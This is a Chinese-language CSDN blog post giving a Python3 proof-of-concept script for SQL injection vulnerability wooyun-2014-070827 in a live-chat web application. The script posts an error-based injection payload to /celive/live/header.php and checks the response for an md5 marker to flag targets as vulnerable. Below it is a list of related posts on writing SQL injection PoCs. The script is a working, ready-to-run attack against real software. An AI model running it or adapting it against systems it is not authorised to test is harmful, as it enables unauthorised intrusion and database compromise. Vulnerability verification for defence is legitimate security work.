sql注入pythonpoc_Python3实现PoC——wooyun-2014-070827(SQL注入)

最新推荐文章于 2023-10-27 00:28:24 发布
最新推荐文章于 2023-10-27 00:28:24 发布
阅读量170 收藏
点赞数
文章标签: sql注入pythonpoc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35517006/article/details/114000540
版权

一、演示一下的利用效果

22e0ff08e970405735b256cdd04bbb7c.png

二、漏洞说明

这次的PoC是验证SQL注入,漏洞详情

三、代码+注释import requests

import argparse

parser = argparse.ArgumentParser()

parser.add_argument(‘-u‘, dest="url")

args = parser.parse_args()

url = args.url

# 存在漏洞的页面

url += "/celive/live/header.php"

# 构造payload,用md5结果来验证

payload = {

‘xajax‘: ‘LiveMessage‘,

‘xajaxargs[0][name]‘: "1‘,(SELECT 1 FROM (select count(*),"

"concat(floor(rand(0)*2),(select md5(888)))a"

" from information_schema.tables group by a)b)"

",‘‘,‘‘,‘‘,‘1‘,‘127.0.0.1‘,‘2‘) #"

}

try:

r = requests.post(url, data=payload)

if(r.status_code == requests.codes.ok):

if "0a113ef6b61820daa5611c870ed8d5ee" in r.text:

print("{} is SQL_vul".format(url))

else:

print("{} is not SQL_vul".format(url))

except Exception as e:

print(str(e))

JASON的知乎
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
37-4 用Python编写SQL注入的基于错误报告的POC
weixin_43263566的博客
04-22 153
SQL注入是一种常见的应用程序安全漏洞,发生在应用程序与数据库层之间。简而言之,它是通过在输入的字符串中注入SQL指令来实现的,如果程序设计不良未进行充分检查,那么这些注入的指令就可能被数据库服务器误认为是正常的SQL指令而被执行,导致数据泄露或系统被入侵。SQL注入漏洞的原理是在输入的数据中插入SQL代码,以利用应用程序对输入数据的不完善验证。对于分类中的每种类型,都需要针对性地设计相应的防御策略,并在代码编写和测试阶段进行充分的安全审查和测试。
python之poc编写——sql
qq_51796436的博客
03-02 6568
sql注入漏洞漏扫单个网站基础sql扫描多个网站sql基础扫描 poc:即验证漏洞是否存在的脚本,也就是扫描器 兄弟们,开始写扫描器啦 sql注入漏洞漏扫 单个网站基础sql扫描 第一步,当然是写request函数啦。除了时间盲注外,1' and 1=2%23就能判断字符型的sql注入
sql注入
linyuezhouzhou的博客
07-08 456
湖南省网安基地
SQL注入类型(详细讲解)
最新发布
diaobusi的博客
10-27 849
在进行SQL注入测试的时候,确实很重要要知道目标SQL语句是什么类型,因为不同类型的SQL语句对注入的有效载荷(payload)有不同的语法要求。
网络安全必学SQL注入
m0_61869253的博客
10-09 62
当找到某个变量关键词有 SQL 注入风险时,可以再根据调用链找到该存在注入风险的业务逻辑代码,查看参数来源是否安全、是否有配置SQL危险参数过滤的过滤器,最终确认是否存在SQL注入。这个简化的查询使得攻击者能够绕过原有的条件限制:这个查询会返回items表中所有储存的条目,而不管它们的所有者是谁,而原本应该只返回属于当前已认证用户的条目。但是就目前来看,书籍是比较靠谱的入门资料。修改SQL语句之后,程序停止报错,但是却引入了SQL语句拼接的问题,如果没有对用户输入的内容做过滤,势必会产生SQL注入漏洞。
44913_sale3ho_CVE-2017-12636_POC_
09-30
压缩包子文件的文件名称 "44913.py" 暗示了这个PoC的具体实现,它是一个Python源代码文件。执行这个文件将执行编写好的攻击代码,重现CVE-2017-12636的漏洞行为。 为了深入了解这个漏洞,我们需要查看44913.py的...
Xsafe#PeiQi-WIKI-POC#天擎 前台SQL注入2
07-25
1. 通过安装包安装的一般都有root权限,因此该注入点可尝试写shell 2. 通过注入点,创建一张表 O 3. 为 表O 添加一个新字段 T 并且写入she
poc练习-dvwa靶场sql注入(盲注)
qq_44248518的博客
02-24 301
dvwasql注入poc(Python)
Drupal 7.31 SQL注入分析及POC
热门推荐
Exploit的小站~
05-10 2万+
这个漏洞昨天爆出的,今天才有时间看代码。 在Drupal中,执行sql语句都是使用PDO模型进行的,这样做一般来说是可以规避大多数的注入,因为占位符的使用对sql语句的语法进行了限制。 但是这也不意味着绝对的安全,比如这次的漏洞。 在Drupal的user模块中,找到user.module: $account = db_query("SELECT * FROM {users} WHER...
sql注入pythonpoco_Python3实现PoC——wooyun-2014-070827(SQL注入)
weixin_39991531的博客
12-11 114
一、演示一下的利用效果二、漏洞说明这次的PoC是验证SQL注入,漏洞详情三、代码+注释importrequestsimportargparseparser=argparse.ArgumentParser()parser.add_argument('-u',dest="url")args=parser.parse_args()url=args.url#存在漏洞的页面url+=...
Python之POC编写
qq_59923059的博客
08-15 1804
Python之POC编写入门
sql注入pythonpoc_SQL注入POC
weixin_39702714的博客
12-17 224
#encoding=utf-8importhttplibimportrequestsimporttimeimportstringimportsyspayloads= list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive Oracle info' % ...
学习Python到写poc其实没那么难
adislj007的博客
04-04 9410
现在,开始! 0x00 前言 今天刚刚把http://drops.wooyun.org/tips/12751放到收藏夹准备看的,然后又看到题主的这个问题。顺便观摩了1楼大神的博客,我这种炒鸡新手表示很兴奋啊,阔以好好学习代码审计吖!但是萌妹子说了“不会开发的谈审计都是耍流氓!:)”。怎么办?? 我不会开发啊,我怎么学啊????? 0x01 不会开发可以”抄” 作为一个学渣,要考试的时候,总是把历年
渗透测试之POC基于布尔的sql盲注
黑面狐
01-03 1105
基于布尔的盲注一般只能告诉我们true or fasle。 就比如你只能向系统提问,但是系统只能回答你是或者不是。 一般套路是先问数据库名字有多长,1,2,3,4直到回答出是,然后获取到数据库名字长度,然后数据库第一个字符是不是a,b,c,d....直到回答是,获取第一个字符,然后按照这个套路获取到第二个第三个字符最后获取到数据库名称,然后再问表,字段。。 还有另一个套路直接字典的,不过这个
用python编写一个查找SQL注入漏洞的POC脚本
04-03
如果包含,则说明存在SQL注入漏洞,并输出触发注入漏洞的payload。 需要注意的是,这个脚本只是一个简单的示例,不一定适用于所有情况。在实际使用中,需要更多的测试和精细的调整来确保准确性和可靠性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值